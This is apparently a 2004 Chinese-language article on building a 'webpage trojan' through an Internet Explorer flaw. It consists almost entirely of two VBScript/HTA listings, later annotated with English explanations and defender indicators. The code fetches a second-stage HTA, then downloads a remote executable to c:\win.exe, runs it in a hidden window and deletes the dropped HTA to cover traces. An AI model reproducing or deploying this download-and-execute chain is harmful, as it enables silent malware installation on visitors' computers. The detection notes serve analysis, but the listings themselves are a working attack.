
利用IE漏洞实现之网页木马

2004-02-19 eNet&Ciweek

  ---------test.asp(木马主页面之一:生成本地HTA)顶部写如下代码----------------------

  <%response.ContentType="application/hta"%>

  <html>

  <object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>

  <script language="VBScript">

  ' Stage-1 fetch routine of the 2004 sample: performs a blocking HTTP GET and,
  ' on a 200 response, passes the response text to SaveFile, which writes it to
  ' disk as c:\win.hta and then triggers execution.
  '   url - address fetched via Microsoft.XMLHTTP (third arg of open is False,
  '         i.e. synchronous)
  ' Returns the response text on status 200; otherwise the function value stays
  ' Empty and the XMLHTTP object is not released (Set ... = nothing sits inside
  ' the If branch, unlike the second listing below).
  ' Defender note: the observable artefacts are an outbound GET from the
  ' browser/HTA host process followed by creation of c:\win.hta.
  Function HttpDoGet(url)

  set oReq = CreateObject("Microsoft.XMLHTTP")

  oReq.open "GET",url,false

  oReq.send

  If oReq.status=200 then

  HttpDoGet=oReq.responseTEXT

  ' Write the fetched text to C:\ as an HTA file (the original author's comment).
  SaveFile HttpDoGet,"c:\win.hta" '在C:根目录下生成HTA文件

  Set oReq=nothing

  End if

  End Function

  '保存文本文件,生成本地HTA。

  ' Writes a text payload to disk and immediately launches it.
  '   str   - text content to write
  '   fName - destination path; CreateTextFile is called with overwrite=True,
  '           so an existing file at that path is silently replaced
  ' Side effect: after closing the file this calls exewin(), so "save" and
  ' "execute" are coupled in one step.
  ' Defender note: file creation under the C:\ root by a scripting host, followed
  ' by a child cmd.exe, is the detectable sequence here.
  sub SaveFile(str,fName)

  Dim fso, tf

  Set fso = CreateObject("Scripting.FileSystemObject")

  Set tf = fso.CreateTextFile(fName, True)

  tf.Write str

  tf.Close

  ' Hand off to the launcher as soon as the file is on disk.
  exewin()

  End sub

  '运行函数

  ' Launcher for stage 1: starts the dropped HTA through cmd.exe with window
  ' style 0 (hidden), then closes the current HTA window so nothing remains
  ' visible to the user.
  ' Defender note: a cmd.exe child of the HTA/browser process with a hidden
  ' window and "c:\win.hta" on its command line is the indicator; the return
  ' value "a" is never checked.
  Sub exewin()

  set wshshell=createobject ("wscript.shell" )

  a=wshshell.run ("cmd.exe /c c:\win.hta",0)

  window.close

  End Sub

  '得到本地HTA文件

  ' Entry point of stage 1: fetch the second listing (ism.mm) and drop it as an
  ' HTA. The host 127.0.0.1 is the author's placeholder; the trailing ";;" looks
  ' like an extraction artefact of the original closing quote and parenthesis.
  HttpDoGet("http://127.0.0.1/ism.mm";;)

  </script>

  </html>

  ---------ism.mm(木马主页面之二:本地HTA页面)顶部写如下代码----------------------

  <html>

  <object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>

  <script language="VBScript">

  ' Stage-2 fetch routine: same blocking GET as stage 1, but reads responseBody
  ' (binary) instead of responseText and hands it to the ADODB.Stream-based
  ' SaveFile, which writes c:\win.exe and launches it.
  '   url - address fetched via Microsoft.XMLHTTP (synchronous)
  ' Returns the raw response body on status 200, Empty otherwise. Here the
  ' object is released after the If, so it is cleaned up on every status.
  ' Defender note: a binary download by a scripting host followed by a new
  ' executable at the C:\ root is the detectable artefact.
  Function HttpDoGet(url)

  set oReq = CreateObject("Microsoft.XMLHTTP")

  oReq.open "GET",url,false

  oReq.send

  If oReq.status=200 then

  HttpDoGet=oReq.responseBody

  ' Write the fetched bytes to C:\ as an exe (the original author's comment).
  SaveFile HttpDoGet,"c:\win.exe" '在C:根目录下生成exe文件

  End If

  Set oReq=nothing

  End Function

  '保存二进制文件,在本地生成exe文件。

  ' Writes a binary payload to disk via ADODB.Stream and immediately launches it.
  '   str   - binary content (the responseBody from HttpDoGet)
  '   fName - destination path; SaveToFile is called with option 2, which
  '           overwrites an existing file at that path
  ' Side effect: calls exewin() after the stream is closed and released, so
  ' writing the file also executes it.
  ' Defender note: ADODB.Stream use from a scripting host to write a .exe is
  ' itself a strong indicator, independent of the file name.
  sub SaveFile(str,fName)

  Set objStream = CreateObject("ADODB.Stream")

  ' Type 1 = binary stream.
  objStream.Type = 1

  objStream.Open

  objstream.write str

  objstream.SaveToFile fName,2

  objstream.Close()

  set objstream = nothing

  ' Hand off to the launcher once the executable is on disk.
  exewin()

  End sub

  '运行函数,执行已经下载的exe程序。

  ' Launcher for stage 2: runs the dropped executable hidden (window style 0),
  ' deletes the stage-1 file c:\win.hta to remove that trace, then closes the
  ' HTA window. Return values "a" and "b" are never checked.
  ' Defender note: because c:\win.hta is deleted here, it may be absent at
  ' triage time; c:\win.exe is left in place, and the cmd.exe /c del on the
  ' command line is itself a useful detection signal.
  Sub exewin()

  set wshshell=createobject ("wscript.shell" )

  a=wshshell.run ("cmd.exe /c c:\win.exe",0)

  b=wshshell.run ("cmd.exe /c del c:\win.hta",0)

  window.close

  End Sub

  '得到远程木马程序

  ' Entry point of stage 2: fetch the executable and drop it as c:\win.exe.
  ' 127.0.0.1 is the author's placeholder host; the trailing ";;" looks like an
  ' extraction artefact of the original closing quote.
  HttpDoGet "http://127.0.0.1/win.exe";;

  </script>

  </html>
